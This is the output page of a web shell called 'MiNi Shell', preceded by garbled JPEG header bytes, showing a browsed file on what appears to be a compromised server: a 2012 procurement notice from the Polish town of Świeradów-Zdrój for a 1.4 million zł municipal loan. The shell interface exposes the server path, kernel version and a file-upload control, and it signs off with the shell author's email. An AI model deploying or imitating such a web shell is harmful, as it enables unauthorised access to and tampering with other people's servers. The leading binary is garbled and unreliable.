JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/92925-N-2012.html

<p class="kh_header"><b>Świeradów-Zdrój: Kredyt bankowy - inwestycyjny, długoterminowy w kwocie 1.400.000,00 zł słownie złotych: jeden milion czterysta tysięcy złotych przeznaczony na spłatę wcześniej zaciągniętych zobowiązań Gminy Miejskiej Świeradów-Zdrój</b><br>
<b>Numer ogłoszenia: 92925 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kredyt bankowy - inwestycyjny, długoterminowy w kwocie 1.400.000,00 zł słownie złotych: jeden milion czterysta tysięcy złotych przeznaczony na spłatę wcześniej zaciągniętych zobowiązań Gminy Miejskiej Świeradów-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wytyczne do warunków zamówienia
 
1. Przedmiot zamówienia - kredyt inwestycyjny długoterminowy w kwocie 
  1.400.000 zł ( jeden milion czterysta tysięcy złotych ) przeznaczony na spłatę 
  wcześniej zaciągniętych kredytów i pożyczek.

2. Okres kredytowania -  10 lat 

3. Uruchomienie kredytu nastąpi na rachunek bieżący Zamawiającego nr: 84 1090      1997 0000 0001 1109 8505 prowadzony w Banku Zachodnim WBK SA 
O/Świeradów-Zdrój  w minimum dwóch  transzach, których terminy
 i kwoty zostaną  ustalone  z bankiem kredytującym przed podpisaniem umowy.                                

4. Spłata kredytu nastąpi w 10 ratach rocznych z karencją spłaty pierwszej raty 
 do 25 kwietnia 2013 roku  w następujących terminach i kwotach: 
  I rata    w wysokości      20.000 zł  płatna  25.04.2013 r.
 II rata    w wysokości      20.000 zł  płatna  25.04.2014 r.
III rata    w wysokości      20.000 zł  płatna  25.04.2015 r.
IV rata    w wysokości      40.000 zł   płatna  25.04.2016 r.
V  rata    w wysokości    200.000 zł  płatna  25.04.2017 r.
VI rata    w wysokości    200.000 zł  płatna  25.04.2018 r.
VII rata   w wysokości    200.000 zł  płatna  25.04.2019 r.
VIII rata  w wysokości    200.000 zł  płatna  25.04.2020 r.
IX rata    w wysokości    250.000 zł  płatna  25.04.2021 r.
X rata     w wysokości    250.000 zł  płatna  25.04.2022 r.

5. Spłata odsetek następować będzie w okresach miesięcznych w dniach ustalonych z bankiem wybranym w wyniku przedmiotowego przetargu przed zawarciem umowy o udzielenie kredytu.

Spłata ostatniej raty odsetek  nastąpi w dniu spłaty ostatniej raty kapitałowej            tj. 25.04.2022 r.

6. Prowizja  z tytułu udzielenia kredytu  będzie płatna w dniu uruchomienia pierwszej transzy  kredytu.

7. Cenę oferty stanowią:

a. oprocentowanie kredytu - zmienne, ustalone w oparciu o stawkę WIBOR 1M z dnia 06 kwietnia 2012 r. wynoszącą  4,71 % i marżę banku - stałą w całym okresie obowiązywania umowy;                              

W celu  obliczenia ceny  (oprocentowania kredytu)  należy przyjąć 
następujące kryteria:

                      - uruchomienie kredytu : 18.05.2012 r. - kwota  1.400.000,00 zł
                      -  spłaty rat kapitałowych: 
              I rata    w wysokości     20.000 zł  płatna   25.04.2013 r.
             II rata    w wysokości     20.000 zł  płatna   25.04.2014 r.
            III rata    w wysokości     20.000 zł  płatna  25.04.2015 r.
            IV rata    w wysokości     40.000 zł  płatna  25.04.2016 r.
            V  rata   w wysokości   200.000 zł  płatna  25.04.2017 r.
            VI rata    w wysokości   200.000 zł  płatna  25.04.2018 r.
            VII rata   w wysokości   200.000 zł  płatna  25.04.2019 r.
            VIII rata  w wysokości   200.000 zł  płatna  25.04.2020 r.
             IX  rata  w wysokości   250.000 zł  płatna  25.04.2021 r.
              X rata   w wysokości   250.000 zł  płatna  25.04.2022 r.

               Wyliczenia kwoty odsetek należy dokonać przyjmując 360 dni w roku        
               oraz 30 dni w każdym miesiącu,  wykorzystując wzór arkusza stanowiący 
               załącznik Nr 1 do niniejszych wytycznych,        

b) prowizja z tytułu udzielenia kredytu

       Zamawiający dopuszcza zastosowanie przez banki uczestniczące            
       w postępowaniu, zwane dalej wykonawcami, prowizji przygotowawczej 
       w wysokości nie  przekraczającej 1% kwoty kredytu. Oferty 
       wykonawców, którzy zaoferują prowizję przygotowawczą w wysokości 
       wyższej niż 1% kwoty kredytu będą odrzucane.

 8.  Sposób obliczania ceny oferty.
      Cena oferty = kwota odsetek od kredytu wyliczona za cały okres kredytowania                                                 
                             + prowizja z tytułu udzielenia kredytu.

9. Opis kryterium oceny i wyboru ofert.
   Zamawiający przy wyborze najkorzystniejszej oferty  będzie posługiwać się
   następującymi kryteriami:
   
Oferowana stopa odsetek w procentach winna stanowić sumę wskaźnika 
WIBOR 1 M z dn. 06.04.2012 r. wynoszącego 4,71%, marży banku i prowizji 
od udzielonego kredytu.

Oprócz powyższych założeń do wyliczenia ceny kredytu przyjęto wykorzystanie przyznanego kredytu w pełnej wysokości w całym okresie kredytowania  oraz  jednorazową prowizję za przyznanie kredytu w wysokości 1,0%  tj.  14.000 zł.

Wyliczenie wartości zamówienia na podstawie powyższych założeń:

Łączna kwota planowanych do spłaty odsetek od kredytu w kwocie 1.400.000 zł w całym okresie kredytowania:  598.292,78 zł + prowizja 1% tj. 14.000,00 zł =  612.292,78 zł

Planowaną do zaciągnięcia kwotę kredytu w wysokości  1.400.000,00 zł ujęto w Uchwale Nr XIX/91/2011 Rady Miasta Świeradów-Zdrój z dnia 29 grudnia 2011 roku w sprawie budżetu Gminy Miejskiej Świeradów-Zdrój na rok 2012 oraz w Uchwale Nr XIX/90/2011 w sprawie przyjęcia wieloletniej prognozy finansowej Gminy Miejskiej Świeradów-Zdrój z dnia 29 grudnia 2011 roku. Planowana kwota długu została zaopiniowana Uchwałą I/35/2012 Składu Orzekającego Regionalnej Izby Obrachunkowej we Wrocławiu z dnia 2 lutego 2012 roku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 50% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 3577.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy PZP. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ, W celu potwierdzenia, że Wykonawca spełnia warunek nr 2 należy przedłożyć a)w stosunku do osób fizycznych : Oświadczenie o spełnianiu warunków określonych w art. 24 ust.1 ustawy Prawo Zamówień Publicznych , b) w stosunku do pozostałych podmiotów : -aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert Oświadczenie w zakresie art. 24 ust. 1 ustawy PrawoZamówień Publicznych Wykonawca spełnia warunek nr 2 jeżeli przedłoży : w stosunku do osób fizycznych -oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 3 do SIWZ, w stosunku do pozostałych podmiotów-aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz ,Oświadczenie o spełnianiu warunków określonych w art. 24 ust.1 ustawy Prawo Zamówień Publicznych, Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 3 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie prawo zmiany umowy kredytowej w zakresie :
a) zmiany obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
b) zmiany nazwy, siedziby lub innych danych Wykonawcy,
c) zmianę terminu wykonania umowy,
d) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana rachunku bankowego),
e) zmiana w przypadku powstania rozbieżności lub niejasności w rozumieniu pojęć uzytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.

2. Zamawiający zastrzega sobie jednocześnie prawo do :
a) wykorzystania kredytu w kwocie niższej niż  1.400.000,00 zł oraz do  zmiany harmonogramu spłat rat kapitałowych spowodowanej wykorzystaniem niższej kwoty kredytu -  bez ponoszenia kosztów z tego tytułu  w postaci opłat i prowizji,
b) wcześniejszej spłaty części lub całości kredytu bez ponoszenia  kosztów z tytułu prowizji lub opłat za przedterminową  spłatę,
c) nie pobierania przez bank kredytujący opłat i prowizji  od niewykorzystanej kwoty kredytu,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11-go Listopada 35 Świeradów-Zdrój pokój nr 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2012 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11-go Listopada 35 Świeradów-Zdrój sekretariat pokój nr 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com